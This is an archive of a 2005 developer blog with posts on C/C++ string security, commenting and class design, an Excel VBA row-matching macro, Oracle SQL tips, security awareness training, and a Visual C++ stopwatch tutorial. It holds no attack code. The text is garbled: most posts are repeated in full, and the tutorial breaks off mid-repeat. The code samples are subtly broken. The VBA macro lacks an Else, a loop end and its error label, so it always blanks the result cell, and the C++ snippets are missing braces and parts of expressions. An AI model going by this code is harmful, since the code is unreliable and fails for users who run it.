Thanks to OSNews.com for posting this sample chapter from “Secure Coding in C/C++” about common pitfalls with Strings in C/C++. While this is an age-old discussion, it’s obviously still valid since these issues still exist in modern software. If a more appropriate higher level language with an actual string type is available, it should be used. Knowing which tools to use and when to use them is an important aspect of being a developer. Experience and dogma have not made developers immune from mistakes and this article has great information on various types of issues that can arise from character arrays, different stack protection routines, and even the venerable std::basic_string class. I was unaware of the Stack Smashing Protector for GCC. Funny that this was released at this time, I was going to write an article demonstrating buffer overflows for a future article. With this sample chapter and a little old Phrack Article, I have a great base to start from.
Thursday, December 01, 2005
Comments and Classes
I came across this article entitled “How to Write Comments”. I feel that generally this is really good advice. However, the author intermingles the topics of good commenting and object design, which are not the same thing. These are topics that cannot be fully addressed in a single article, so I will only touch on them.
There seems to be debate as to the “reason” why you comment your code. Personally, I don’t think there should be question as to why you write you comments, you just do it. Code is easier to understand, is more maintainable, and typically is better quality when commented. If I had to give a single reason, I would have to agree with the author that the primary reason is for readability of the code, whether it is for other coders, or for yourself. How many times have you had to revisit some piece of code you wrote a long time ago, and had to ask yourself “What the hell was I thinking?” Imagine that another coder had to figure that out. I try to imagine that everyone’s time is as limited as mine, which means they don’t have time to trace through code to figure out some ridiculous algorithm. While commenting is definitely and important aspect of design, I rank readability higher. I feel that design should be done separately through flow charts, pseudo-code, or UML and transitioned to comments before writing code. This is especially true for larger projects where tasks are broken up among individuals where the program flow is designed in a case tool and the programmers are simply typing it in and debugging.
Unfortunately, modern languages are not as verbose as languages like COBOL. COBOL is a wordy language, with very descriptive syntax. Languages like Java and C make commenting even more necessary for understanding the logic due to their use of symbols and their syntactical flexibility. My rule of thumb is to comment blocks of code accomplishing a single task in the problem solving steps. Some argue for very verbose commenting, some argue for less. I say use as much wording as is necessary to fully describe the task, and if possible, why are you using that approach. For example, lets say we had an object that handles connections to a database. Establishing a connection to the database is a single step in the overall algorithm, however it requires several steps of its own. So a single, descriptive comment telling a reader that you are setting the required properties and establishing the database connection would precede the series of lines. Below are two examples using the fictitious object to establish a database connection demonstrating commenting to describe what is being done.
Ex 1:
//Establish a database connection using the connect call, passing in the user name
//password, and database to connect to. This is done to avoid overhead of calling
//the separate set functions for the three properties and to take advantage of the
//error handling built in to the overloaded connect method
data_object->connect(“user”, “password”, “OracleInstance1”);
Ex 2:
//A database connection is established by setting the user name, password,
//and database name, then calling the connect method. This is done separately
//for readability and clarity on the separate steps and to isolate data assignment
//errors from database connection errors
The above examples explain what the code is doing, and why.
Object design is another issue altogether. Understanding what objects are goes a long way to writing good objects. Objects are “abstractions of real world objects” that “know things” (properties) and “knows how to do things” (methods) (The Object-Oriented Approach: Concepts, Systems Development, and Modeling with UML page 17). This is one of the best definitions I have ever read for the definition of an object. Objects can be a representation in the system of anything, such as an airplane, care, disk drive, incident, or location. Classes are definitions of those objects. Objects are implementations of classes. These terms are used inappropriately used interchangeably sometimes. However if you understand those definitions, you can derive their meaning from the context. Books are written about good object design principles, so I will not go in to depth.
I agree with the author that objects should be describable in one “noun”, I question “verb” since actions are supposed to be reserved for methods, but I will concede that for the time being. Lets look at an example. Here is a simple event class from some sort of event generator. Events have a description, unique id, and a timestamp. These are the properties of the Event object. In the context of our system, the Event class will also need to know how to write the event out to a database, read an event in from a database, and generate the unique ID. These are the methods. The database related methods will be exposed for public use since we want the outside world to interact with those methods. The outside world does not care how the unique ID is generated, so it will be private. We will also need methods to set and return the values in our properties. This is the preferred method for exposing properties since it allows for type checking, error handling, possible logic built into property assignment, and to allow properties to be read-only or write-only. The class definition in C++ would look something like this:
//This class will handle Events from our fictitious event system
class event{
//variables relating to the event
string p_unique_id; //the ID for this events
string p_description; //What is the actual alert message
time_t p_timestamp; //when did the event occur
//internal function to generate the ID for a new event
string generate_unique_id();
//public methods exposing the properties of the event
string get_unique_id();
string get_description();
string get_timestamp();
//public methods allowing for assignment of properties
int set_unique_id(const string &);
int set_description(const string &);
int set_timestamp(const string &);
//methods to work with a database for events
int retrieve_Event_from_Database(string &);
int insert_Event_into_Database();
In the above, what the object “knows”, and what it “knows how to do” are clearly defined. As a developer, I can interact with that object through its exposed methods, and the implementation is taken care of behind the scenes. I don’t care how it does it, as long as it does what it is supposed to do. A good class should shield me from the specifics, and do one thing and do it really well. The above class is simple and handles only one simple abstraction.
One of the biggest issues with Object Oriented Analysis and Design comes from choosing an OO language where it is not the appropriate language of choice for a project. OOAD has been touted as “The Way” for so long that people try to kludge it to scenarios where is not appropriate. For a simple program to run a sequence of steps, a scripting language would be more appropriate. For a low-level operating system driver handling a device or a tightly constrained program running on an embedded device, assembler or C would be more appropriate. For a simple piece of office software like a clock in/clock out program, Visual Basic would be more appropriate. For a system representing real world objects and procedures, an OO based language like C++ or Java would definitely fit. Knowing which scenarios to apply OO design concepts is essential to design. OO programming is not the end all answer to all software design issues; it is merely another tool in the developer’s toolkit.
There are several tools for working with OOAD models. The most robust one I have worked with is Rational Rose. However, Rose has a hefty price tag well outside most consumers. My alternative favorite is Umbrello, which is now included in the KDE SDK. I use it both under Linux and under Windows using Cygwin and it works very well, and includes a basic code generator. Visio also has stencils for UML models, although I only use Visio for flowcharts when Dia is unavailable.
There seems to be debate as to the “reason” why you comment your code. Personally, I don’t think there should be question as to why you write you comments, you just do it. Code is easier to understand, is more maintainable, and typically is better quality when commented. If I had to give a single reason, I would have to agree with the author that the primary reason is for readability of the code, whether it is for other coders, or for yourself. How many times have you had to revisit some piece of code you wrote a long time ago, and had to ask yourself “What the hell was I thinking?” Imagine that another coder had to figure that out. I try to imagine that everyone’s time is as limited as mine, which means they don’t have time to trace through code to figure out some ridiculous algorithm. While commenting is definitely and important aspect of design, I rank readability higher. I feel that design should be done separately through flow charts, pseudo-code, or UML and transitioned to comments before writing code. This is especially true for larger projects where tasks are broken up among individuals where the program flow is designed in a case tool and the programmers are simply typing it in and debugging.
Unfortunately, modern languages are not as verbose as languages like COBOL. COBOL is a wordy language, with very descriptive syntax. Languages like Java and C make commenting even more necessary for understanding the logic due to their use of symbols and their syntactical flexibility. My rule of thumb is to comment blocks of code accomplishing a single task in the problem solving steps. Some argue for very verbose commenting, some argue for less. I say use as much wording as is necessary to fully describe the task, and if possible, why are you using that approach. For example, lets say we had an object that handles connections to a database. Establishing a connection to the database is a single step in the overall algorithm, however it requires several steps of its own. So a single, descriptive comment telling a reader that you are setting the required properties and establishing the database connection would precede the series of lines. Below are two examples using the fictitious object to establish a database connection demonstrating commenting to describe what is being done.
Ex 1:
//Establish a database connection using the connect call, passing in the user name
//password, and database to connect to. This is done to avoid overhead of calling
//the separate set functions for the three properties and to take advantage of the
//error handling built in to the overloaded connect method
data_object->connect(“user”, “password”, “OracleInstance1”);
Ex 2:
//A database connection is established by setting the user name, password,
//and database name, then calling the connect method. This is done separately
//for readability and clarity on the separate steps and to isolate data assignment
//errors from database connection errors
The above examples explain what the code is doing, and why.
Object design is another issue altogether. Understanding what objects are goes a long way to writing good objects. Objects are “abstractions of real world objects” that “know things” (properties) and “knows how to do things” (methods) (The Object-Oriented Approach: Concepts, Systems Development, and Modeling with UML page 17). This is one of the best definitions I have ever read for the definition of an object. Objects can be a representation in the system of anything, such as an airplane, care, disk drive, incident, or location. Classes are definitions of those objects. Objects are implementations of classes. These terms are used inappropriately used interchangeably sometimes. However if you understand those definitions, you can derive their meaning from the context. Books are written about good object design principles, so I will not go in to depth.
I agree with the author that objects should be describable in one “noun”, I question “verb” since actions are supposed to be reserved for methods, but I will concede that for the time being. Lets look at an example. Here is a simple event class from some sort of event generator. Events have a description, unique id, and a timestamp. These are the properties of the Event object. In the context of our system, the Event class will also need to know how to write the event out to a database, read an event in from a database, and generate the unique ID. These are the methods. The database related methods will be exposed for public use since we want the outside world to interact with those methods. The outside world does not care how the unique ID is generated, so it will be private. We will also need methods to set and return the values in our properties. This is the preferred method for exposing properties since it allows for type checking, error handling, possible logic built into property assignment, and to allow properties to be read-only or write-only. The class definition in C++ would look something like this:
//This class will handle Events from our fictitious event system
class event{
//variables relating to the event
string p_unique_id; //the ID for this events
string p_description; //What is the actual alert message
time_t p_timestamp; //when did the event occur
//internal function to generate the ID for a new event
string generate_unique_id();
//public methods exposing the properties of the event
string get_unique_id();
string get_description();
string get_timestamp();
//public methods allowing for assignment of properties
int set_unique_id(const string &);
int set_description(const string &);
int set_timestamp(const string &);
//methods to work with a database for events
int retrieve_Event_from_Database(string &);
int insert_Event_into_Database();
In the above, what the object “knows”, and what it “knows how to do” are clearly defined. As a developer, I can interact with that object through its exposed methods, and the implementation is taken care of behind the scenes. I don’t care how it does it, as long as it does what it is supposed to do. A good class should shield me from the specifics, and do one thing and do it really well. The above class is simple and handles only one simple abstraction.
One of the biggest issues with Object Oriented Analysis and Design comes from choosing an OO language where it is not the appropriate language of choice for a project. OOAD has been touted as “The Way” for so long that people try to kludge it to scenarios where is not appropriate. For a simple program to run a sequence of steps, a scripting language would be more appropriate. For a low-level operating system driver handling a device or a tightly constrained program running on an embedded device, assembler or C would be more appropriate. For a simple piece of office software like a clock in/clock out program, Visual Basic would be more appropriate. For a system representing real world objects and procedures, an OO based language like C++ or Java would definitely fit. Knowing which scenarios to apply OO design concepts is essential to design. OO programming is not the end all answer to all software design issues; it is merely another tool in the developer’s toolkit.

Wednesday, November 30, 2005
Lack of updates
I would like to apologize for my lack of updates this week. With a combination of research projects coupled with a good friend passing away, I have had a busy week. I will continue posting when I get my head straight again later in the week.
BIRT Presentation at EclipseCon
According to the BirtWorld blog, they will be hosting a half-day seminar at EclipseCon on BIRT. Congratulations guys. Hopefully they can get the additional hour-long presentations. Hopefully they will use those sessions as an introduction to BIRT and give an overview of the goals of the BIRT project. I unfortunately probably will not attend, so I wish the BIRT crew the best of luck.
Friday, November 25, 2005
Excel Row Matching
I see a lot of requests for information regarding how to match rows in Excel. Fortunately, there are several approaches for row matching in Excel. I tend to look at matching in two general categories, matching rows that are side by side, and matching rows to any value in a target column.
The first one is easy. Sort both columns, insert an indicating column, then use a simple formula like so:
“=A1 = C1”
The result is a Boolean value indicating a match has occurred.

Figure 1: Match side by side rows using a formula
The second category can be done in several ways. VLOOKUP, which has the tendency to be a big PITA, or its less powerful cousin, MATCH. Unlike VLOOKUP, which allows you to return a value based on a column match (example: VLOOKUP will return the value in column D where column C matches the value in column A), MATCH will return the row number in a target range where the source value is found. If there is no match, the function returns “#N/A”.

Figure 2: Match rows using the worksheet MATCH function.
There are times where you will need to do a match programmatically in VBA rather than using worksheet functions. It is possible to use Excels objects to get values from worksheet functions, or you could use an approach like the below macro, which can easily be modified to return the values in row, the row number, or a simple indicator letting the user know a match has occurred.
Sub Match_Rows()
'Define the row to start on to take into account header rows
Const START_ROW As Integer = 2
'x is a generic counter
Dim x As Integer
'Source, destination, and column to put X indicatiors columns
Dim srcColumn As String
Dim matchColumn As String
Dim dstColumn As String
'Variable to store the number of rows to process
Dim LastRow As Integer
'Used as a temporary object to indicate a match was found
Dim found_cell As Range
'Value to match
Dim matchValue As String
'Get the number of rows in this worksheet by using Excels internal countA function
'I use this instead of looking for blank cells because this has shown itself to be more accurate
If WorksheetFunction.CountA(Cells) > 0 Then
LastRow = Cells.Find(What:="*", After:=[A1], _
SearchOrder:=xlByRows, _
End If
'If there are no rows, exit out of the function
If LastRow = 0 Then
MsgBox "There are no rows in this worksheet", vbOKOnly
Exit Sub
End If
'Prompt the user for the source column containint employee IDs and the destination
'column indicating that the employee is active
srcColumn = InputBox("Enter the Source Column: ")
matchColumn = InputBox("Enter the Match Target Column: ")
dstColumn = InputBox("Enter the Results column: ")
'Set our generic counter to the start row defined in the constants section
'Loop from our starting row to the last row, on error use the general exception handler
On Error GoTo Error_Occured
For x = START_ROW To LastRow
'Get the value to match
matchValue = Cells(Val(x), Trim(UCase(srcColumn))).Value
'Select the match Column
Columns(UCase(matchColumn) & ":" & UCase(matchColumn)).Select
'Set the found_Cell object to an instance inside of the matching column
'that has a matching value
Set found_cell = Selection.Find(What:=matchValue, After:=ActiveCell, LookIn:= _
xlValues, LookAt:=xlWhole, SearchOrder:=xlByRows, SearchDirection:= _
xlNext, MatchCase:=False)
'If the object was found, set the target to "X", otehrwise set to blank
If Not found_cell Is Nothing Then
Range(Trim(UCase(dstColumn)) & Val(x)).Value = "X"
Range(Trim(UCase(dstColumn)) & Val(x)).Value = ""
End If
'reset found_cell to nothing after each run
Set found_cell = Nothing
Exit Sub
'The general exception handler
Set found_cell = Nothing
MsgBox "An error occured", vbOKOnly
End Sub
The first one is easy. Sort both columns, insert an indicating column, then use a simple formula like so:
“=A1 = C1”
The result is a Boolean value indicating a match has occurred.

Figure 1: Match side by side rows using a formula
The second category can be done in several ways. VLOOKUP, which has the tendency to be a big PITA, or its less powerful cousin, MATCH. Unlike VLOOKUP, which allows you to return a value based on a column match (example: VLOOKUP will return the value in column D where column C matches the value in column A), MATCH will return the row number in a target range where the source value is found. If there is no match, the function returns “#N/A”.

Figure 2: Match rows using the worksheet MATCH function.
There are times where you will need to do a match programmatically in VBA rather than using worksheet functions. It is possible to use Excels objects to get values from worksheet functions, or you could use an approach like the below macro, which can easily be modified to return the values in row, the row number, or a simple indicator letting the user know a match has occurred.
Sub Match_Rows()
'Define the row to start on to take into account header rows
Const START_ROW As Integer = 2
'x is a generic counter
Dim x As Integer
'Source, destination, and column to put X indicatiors columns
Dim srcColumn As String
Dim matchColumn As String
Dim dstColumn As String
'Variable to store the number of rows to process
Dim LastRow As Integer
'Used as a temporary object to indicate a match was found
Dim found_cell As Range
'Value to match
Dim matchValue As String
'Get the number of rows in this worksheet by using Excels internal countA function
'I use this instead of looking for blank cells because this has shown itself to be more accurate
If WorksheetFunction.CountA(Cells) > 0 Then
LastRow = Cells.Find(What:="*", After:=[A1], _
SearchOrder:=xlByRows, _
End If
'If there are no rows, exit out of the function
If LastRow = 0 Then
MsgBox "There are no rows in this worksheet", vbOKOnly
Exit Sub
End If
'Prompt the user for the source column containint employee IDs and the destination
'column indicating that the employee is active
srcColumn = InputBox("Enter the Source Column: ")
matchColumn = InputBox("Enter the Match Target Column: ")
dstColumn = InputBox("Enter the Results column: ")
'Set our generic counter to the start row defined in the constants section
'Loop from our starting row to the last row, on error use the general exception handler
On Error GoTo Error_Occured
For x = START_ROW To LastRow
'Get the value to match
matchValue = Cells(Val(x), Trim(UCase(srcColumn))).Value
'Select the match Column
Columns(UCase(matchColumn) & ":" & UCase(matchColumn)).Select
'Set the found_Cell object to an instance inside of the matching column
'that has a matching value
Set found_cell = Selection.Find(What:=matchValue, After:=ActiveCell, LookIn:= _
xlValues, LookAt:=xlWhole, SearchOrder:=xlByRows, SearchDirection:= _
xlNext, MatchCase:=False)
'If the object was found, set the target to "X", otehrwise set to blank
If Not found_cell Is Nothing Then
Range(Trim(UCase(dstColumn)) & Val(x)).Value = "X"
Range(Trim(UCase(dstColumn)) & Val(x)).Value = ""
End If
'reset found_cell to nothing after each run
Set found_cell = Nothing
Exit Sub
'The general exception handler
Set found_cell = Nothing
MsgBox "An error occured", vbOKOnly
End Sub
Tuesday, November 22, 2005
Oracle SQL Programming Tips
I am going to share a few little I use for day-to-day SQL programming tasks
Build ADO database connection strings using UDL files
- A little known and documented feature in Windows (at least I haven’t had much luck finding loads of documentation on it) is the Universal Data Link connection files. These create the really confusing ConnectionStrings used in ADODB.Connection.ConnectionString properties. The easiest way to create one of these is to right-mouse click on the Windows Desktop, go to New, and choose Text File (Note: Microsoft’s knowledge base states that when you click on New, the “Microsoft Data Link” should be visible. It is not in my case). When the file is created, change the file extension from .TXT to .UDL. When you want to create a ConnectionString, double-click the new UDL file. It will open the Data Link Properties Wizard. Set your provider, connection information and you are set. All you need to do to get that connection string is open the file in Notepad (or your editor of choice), copy that string, and paste it into your ConnectionString assignment. Alternatively, you can also set the ConnectionString property to point directly to the UDL file itself and avoid hard coding the string into your program. See Microsoft Knowledge Base article Q189680 for more info.
SQL Code Beautifier
Query optimization in Oracle
- Working with Oracle can be a daunting task, especially if you are not familiar with Oracles Cost-Based Optimizer. If you have queries in your application that you suspect might be causing issues, use Oracle Query Analyzer from SqlPlus to show if your query needs a little tweaking. The syntax for Oracle 8i and above is (it may work in earlier versions):
set autotrace traceonly explain
There is one prerequisite. You must have access to a Plan_Table with write permissions either through a synonym, or in your local schema. The Plan_Table definition I use is from “Oracle 8i DBA Bible” from IDG Books (although some of these fields are unnecessary). The table looks like so:
Now, when you run a query, it will not actually execute the query, and will display Oracles execution plan. The execution plan relies very heavily on table statistics, so if you are getting full table scans; work with your DBA to optimize tables for the queries you are using and update the table and index statistics. A good reference for SQL tuning is “Oracle SQL Tuning Pocket Reference” from O’Reilly.
Use SQL Loader for data loads
- Unfourtunatly sending large delimited text files is still a widely used practice for data transfers. If you are using Oracle, there is a way to make loading these files into a table much easier than using a proprietary method. Oracle provides a command line utility called SqlLdr (SQL Loader) for loading in flat text files. Using a control file, you tell which delimited fields to into which the correct fields in your target table. Since SQL Loader can be a difficult program, I will refer you to the following links on SQL Loader, they do a far better job explaining than I could, and they contain the source for a SQL script to create the control file:
- http://www.oracleutilities.com/OSUtil/sqlldr.html
- http://www.orafaq.com/faqloadr.htm
Sunday, November 20, 2005
Response to Security Awareness: Waste of Time?
Richard Bejtlich posted an excellent topic on Security Awareness Training on his blog. I say this is an excellent topic because it brings up the teetering balance of usability vs. security in today’s IT based workplace, and the question of the balance of power between IT staff and Business Staff. I responded to his post here.
Now I'm not advocating abandoning IS Awareness. If even one intrusion is prevented as a result, then it was a success. A previous poster pointed out that in saying it is “another layer or protection”. Just because a firewall can be bypassed doesn’t mean you throw it out the window, the same with an IDS that doesn’t detect 0-day exploits. It’s that it is horribly inefficient, as the author’s case study shows. The problem is the target audience does not have the aptitude to understand that the "dancing donkey" email from their friend isn't really from their friend, or that their friend is just forwarding emails that they get in their "joke" distribution list. Here is the typical scenario I come across:
Employee gets email from friend.
Employee clicks on the singing Happy Bunny, it has a Trojan, infects computer.
Staff cleans up the infection.
Staff tells employee to be careful about the email they receive.
Employee mentally tells the staff to "F*** off" since they are not going to tell their friend to stop sending them messages.
Employee gets another email from friend.
Employee sends back message saying "Your last message had a virus, are you sure this one is OK".
Friend sends back message "Yes, its fine, I just ran it on my system"
I don’t mean to belittle the target audience, and I am not insinuating they are slow, although that applies to some. I am not going to say these people are stupid because they don’t understand the basic principles of social engineering and how to avoid them, because they are the same people that will talk circles around me in areas like finance, politics, investment services, and can easily “persuade” me to buy that piece of junk car on their used car lot (or in my recent headaches, motorcycle, but that’s another story). Its not that these people are stupid, its like Richard Bejtlich indicated in his article, there is a “Division of Labor”, and these people are professionals in their divisions. A lot of these employees still have the old school mindset of how a business runs, and are trying to adapt. In their minds, there is still a hierarchical structure, and things that are not the specific function of their branch are not their concern. However, they are overwhelmed with their BAU workload created by today’s networked environments as they receive messages on the fly, which is creating a boundary-less organization. As a result, they try to adapt by trying to provide results at a pace that keeps up with the changing of business. With multiple requests coming in, are they going to tell a VP no, investigate every request and still keep pace? In a way, this contributes to Social Engineering, and makes IS awareness necessary, but at the same time, detracts from its usefulness by opposing the “Now, Now, Now” results expectancy timeframe of the boundary-less organization. This is one of the many reasons I believe we try to put technology into too many things that really do not need it. I agree with Rich, if IM and external web browsing are not necessary for an employees job function, and does demonstrate a potential risk due to the number of vulnerabilities in browser software and exploits for those vulnerabilities that may be out there, then remove those functionalities for those employees. Unless the user can demonstrate a clear need for desktop administrative access, do not give them that access. There needs to be a clear, distinct reason for a user to have said access. In the company I work for, we call that a Standard Operating Environment (SOE), every user that does not have an exceptional necessity for escalated functionality gets the same access that everyone else does.
While the above is an argument for giving IT more administrative power, I believe that IT political power should go in the exact opposite direction. Here is a true story. We had a series of physical incidents on PC's at our company. One case, a person sat down at my desk, and began doing something on my PC (which was locked, he apparently had Domain Admin access or knew the local Admin password). One of my staff members noticed this, approached him, and began immediately questioning him about who he was and what he was doing. This person left immediately. As a result, I put on the bios password of my PC since I have potentially sensitive information that no one is privy to except myself, HR, and the individuals in question. One weekend, an IT manager came in with his staff to do some routine maintenance, and of course, they couldn't get in to my system. When I returned on Monday, the IT manager called, and instead of being professional, he threatened to fire me (a power he did not have, and was called on it) for "subverting his authority", and other choice niceties at a decibel level that was unacceptable for a work environment. I found his behavior unprofessional, and fortunately my superiors backed me up on this incident. In due time, and I assume several incidents of this nature later, he was reassigned to a position that was "less customer facing", customers in this context being the employees of our company. Myself and other in my organization are leery of IT for this very reason. This was not an isolated incident within my company either, as I have spoken with a number of individuals in different companies with similar experiences from their IT staff. This kind of behavior leads to the “Nick Burns, Your Company Computer Guy” stereotype that IT staff receive for being arrogant, condescending, and rude individuals, and sometimes it is not undeserving. This is not the caliber of person that should be given more political authority under any circumstances. This distrust lends itself to the lack of effectiveness in Security Awareness training by IT staff.
The clear indication is there is a definite lack of communication between IT and the Business. Floor managers do not understand terms like “virus”, “exploit”, “buffer overflow”, and “social engineering”. They do understand terms like “cost of repair”, “shrink”, and “loss of profit”. As I suggested, a local IT department that understands the needs and logic of the business and has that relationship with the floor managers can more easily explain the potential risks to information assets in a language more easily understood than “Nick Burns” can (There is a reason that skit is so funny, because there is truth to it). A centralized IT department servicing all the business units will, by design, be ineffective since there are too many variations to account for and a lack of a common language between the principle parties.
Now I'm not advocating abandoning IS Awareness. If even one intrusion is prevented as a result, then it was a success. A previous poster pointed out that in saying it is “another layer or protection”. Just because a firewall can be bypassed doesn’t mean you throw it out the window, the same with an IDS that doesn’t detect 0-day exploits. It’s that it is horribly inefficient, as the author’s case study shows. The problem is the target audience does not have the aptitude to understand that the "dancing donkey" email from their friend isn't really from their friend, or that their friend is just forwarding emails that they get in their "joke" distribution list. Here is the typical scenario I come across:
Employee gets email from friend.
Employee clicks on the singing Happy Bunny, it has a Trojan, infects computer.
Staff cleans up the infection.
Staff tells employee to be careful about the email they receive.
Employee mentally tells the staff to "F*** off" since they are not going to tell their friend to stop sending them messages.
Employee gets another email from friend.
Employee sends back message saying "Your last message had a virus, are you sure this one is OK".
Friend sends back message "Yes, its fine, I just ran it on my system"
I don’t mean to belittle the target audience, and I am not insinuating they are slow, although that applies to some. I am not going to say these people are stupid because they don’t understand the basic principles of social engineering and how to avoid them, because they are the same people that will talk circles around me in areas like finance, politics, investment services, and can easily “persuade” me to buy that piece of junk car on their used car lot (or in my recent headaches, motorcycle, but that’s another story). Its not that these people are stupid, its like Richard Bejtlich indicated in his article, there is a “Division of Labor”, and these people are professionals in their divisions. A lot of these employees still have the old school mindset of how a business runs, and are trying to adapt. In their minds, there is still a hierarchical structure, and things that are not the specific function of their branch are not their concern. However, they are overwhelmed with their BAU workload created by today’s networked environments as they receive messages on the fly, which is creating a boundary-less organization. As a result, they try to adapt by trying to provide results at a pace that keeps up with the changing of business. With multiple requests coming in, are they going to tell a VP no, investigate every request and still keep pace? In a way, this contributes to Social Engineering, and makes IS awareness necessary, but at the same time, detracts from its usefulness by opposing the “Now, Now, Now” results expectancy timeframe of the boundary-less organization. This is one of the many reasons I believe we try to put technology into too many things that really do not need it. I agree with Rich, if IM and external web browsing are not necessary for an employees job function, and does demonstrate a potential risk due to the number of vulnerabilities in browser software and exploits for those vulnerabilities that may be out there, then remove those functionalities for those employees. Unless the user can demonstrate a clear need for desktop administrative access, do not give them that access. There needs to be a clear, distinct reason for a user to have said access. In the company I work for, we call that a Standard Operating Environment (SOE), every user that does not have an exceptional necessity for escalated functionality gets the same access that everyone else does.
While the above is an argument for giving IT more administrative power, I believe that IT political power should go in the exact opposite direction. Here is a true story. We had a series of physical incidents on PC's at our company. One case, a person sat down at my desk, and began doing something on my PC (which was locked, he apparently had Domain Admin access or knew the local Admin password). One of my staff members noticed this, approached him, and began immediately questioning him about who he was and what he was doing. This person left immediately. As a result, I put on the bios password of my PC since I have potentially sensitive information that no one is privy to except myself, HR, and the individuals in question. One weekend, an IT manager came in with his staff to do some routine maintenance, and of course, they couldn't get in to my system. When I returned on Monday, the IT manager called, and instead of being professional, he threatened to fire me (a power he did not have, and was called on it) for "subverting his authority", and other choice niceties at a decibel level that was unacceptable for a work environment. I found his behavior unprofessional, and fortunately my superiors backed me up on this incident. In due time, and I assume several incidents of this nature later, he was reassigned to a position that was "less customer facing", customers in this context being the employees of our company. Myself and other in my organization are leery of IT for this very reason. This was not an isolated incident within my company either, as I have spoken with a number of individuals in different companies with similar experiences from their IT staff. This kind of behavior leads to the “Nick Burns, Your Company Computer Guy” stereotype that IT staff receive for being arrogant, condescending, and rude individuals, and sometimes it is not undeserving. This is not the caliber of person that should be given more political authority under any circumstances. This distrust lends itself to the lack of effectiveness in Security Awareness training by IT staff.
The clear indication is there is a definite lack of communication between IT and the Business. Floor managers do not understand terms like “virus”, “exploit”, “buffer overflow”, and “social engineering”. They do understand terms like “cost of repair”, “shrink”, and “loss of profit”. As I suggested, a local IT department that understands the needs and logic of the business and has that relationship with the floor managers can more easily explain the potential risks to information assets in a language more easily understood than “Nick Burns” can (There is a reason that skit is so funny, because there is truth to it). A centralized IT department servicing all the business units will, by design, be ineffective since there are too many variations to account for and a lack of a common language between the principle parties.
Friday, November 18, 2005
Visual Studio 2005 Express Impressions
I have been evaluating Microsoft’s Visual Studio Express Editions during their Public Beta and after their initial release. These are scaled down, free editions of their respective Visual Studio counterparts, such as Visual Basic, C++, C#, and a separate version for web application development, aimed at standalone developers, hobbyist, and students. Considering Microsoft’s reputation, this is an uncharacteristic move for them, but a very good one in my opinion. This should allow for an even larger developer community to grow on the Windows platform. One of the biggest criticisms of Windows from the Open Source community is the availability of powerful, freely availably developer tools. For most *nix distributions, GCC comes with the packages, and has tons of additional IDE for development, while Windows typically has had to rely on commercial offerings. I feel that these new programs from Microsoft go a long way into addressing these issues (although not completely, you still need to register, and the license is only valid for 1 year).
In this article I will take a look at a simple program in Visual C++ to familiarize you with the Visual Studio environment. This program is a simple Stop Watch type program. The user will be able to enter in a number of Hours, Minutes, and Seconds, and when the time is up, a MessageBox will pop up informing the user that time is up.
First, build the form as shown below. I have included two buttons to start and stop the timer, three NumericUpDown components for setting the Hours, Minutes, and seconds, a text box to show a time countdown, and a progress bar to show overall progress. The Timer component is a non-visual component, so it shows up in a separate section on the bottom of the visual designer. Set the values for the components as you see fit. With the exceptions of the labels, I left the properties on all components default.

Under the class declaration for this form, I added the following two private variables for persistency.
//My private variables for this form. Set the time to end the
//timer and the total duration
private: System::DateTime endTime;
private: System::TimeSpan total_duration;
The function for the button click is as follows:
private: System::Void button1_Click(System::Object^ sender, System::EventArgs^ e) {
System::DateTime currentTime;
//Set the end time, used actual instance of endTime rather than
//System::DataTime->Now. the reason I set this to an object
//rather than just setting the values on assignment below
//is to freeze the time so we do not have a shift in
//seconds at the time of this function completing.
currentTime = currentTime.Now;
endTime = currentTime;
//Add the number of hours, mins, and secs to the current time
//to get the itme when the stop watch should stop
endTime = endTime.AddHours(udHours->Value.ToDouble(udHours->Value));
endTime = endTime.AddMinutes(udMins->Value.ToDouble(udMins->Value));
endTime = endTime.AddSeconds(udSec->Value.ToDouble(udSec->Value));
//set ticks to complete to the value of the timer duration
total_duration = (endTime - currentTime);
//Set the indicator text under the progress pane to the duration value.
txtCountDown->Text = total_duration.ToString();
//enable the timer
timer1->Enabled = true;
Next, I use the following method for the timers onTick event.
private: System::Void timer1_Tick(System::Object^ sender, System::EventArgs^ e)
System::Int32 amount_to_increment;
//If time is up, stop the timer and show the message box, otherwise
//continue updating the progress bars
if (System::DateTime::Now >= endTime)
timer1->Enabled = false;
System::Windows::Forms::MessageBox::Show("Times up", "Timer is up", System::Windows::Forms::MessageBoxButtons::OK );
//Update the progress text box with the total duration time minus
//the current system time
txtCountDown->Text = (endTime - System::DateTime::Now).ToString();
//set the total percentage of the progress bar to be
// total_duration minus the current duration from the end. Divide
//that result by the total duration and multiply the end result
//by 100 to give use the percentage. Once we have that
//figured, assign the overall value of the progress bar to that percent
amount_to_increment = (
(total_duration -
(endTime - System::DateTime::Now)
) * 100;
progressBar->Value = amount_to_increment;
And the final method is the Stop button. Below is the code for the Stop button.
private: System::Void cmdStop_Click(System::Object^ sender, System::EventArgs^ e) {
//stop the timer, do not reset any values as this will be done
//on the next start button push
timer1->Enabled = false;
Below is a screenshot of the finished application.

Now my StopWatch is complete. There are a few things to note. In the Timer1 Tick method, I used a System::Int32 variable type instead of an int type. Both types will work interchangeably in this instance, however it seems that Microsoft prefers that types are referenced from the System namespace rather than using the intrinsic data types. I figured this out when I had some issues working with the double type. I also alternated between calling System::DateTime methods without an object instance and calling instantiated object functions.
For a free IDE, this is a very impressive offering. Visual Studio .Net has come a long way since the initial release in 2002. The Visual Designer is incredibly easy to work with, there is very decent debugging capabilities, such as being able to move the mouse over and getting a tree view of objects without needing to use the watch window. That is not to say I don’t have my gripes about it as well. For one, the code that it produces is ugly as hell. Its not as standards compliant than GCC, but I think a lot of that is because I have grown used to working with GCC so much. Also, when working with the Visual Designer, double-clicking on a component to bring up its default method creates the code in the header file, not in a separate implementation file. That is a little annoying. There is also a little too much of the form code and various other default .Net code visible by default. You can collapse those, but it’s still a bit of an eye sore. Overall, I do like this, and I am hoping that they release the SDK for Windows Mobile to this version of Visual Studio.
In this article I will take a look at a simple program in Visual C++ to familiarize you with the Visual Studio environment. This program is a simple Stop Watch type program. The user will be able to enter in a number of Hours, Minutes, and Seconds, and when the time is up, a MessageBox will pop up informing the user that time is up.
First, build the form as shown below. I have included two buttons to start and stop the timer, three NumericUpDown components for setting the Hours, Minutes, and seconds, a text box to show a time countdown, and a progress bar to show overall progress. The Timer component is a non-visual component, so it shows up in a separate section on the bottom of the visual designer. Set the values for the components as you see fit. With the exceptions of the labels, I left the properties on all components default.

Under the class declaration for this form, I added the following two private variables for persistency.
//My private variables for this form. Set the time to end the
//timer and the total duration
private: System::DateTime endTime;
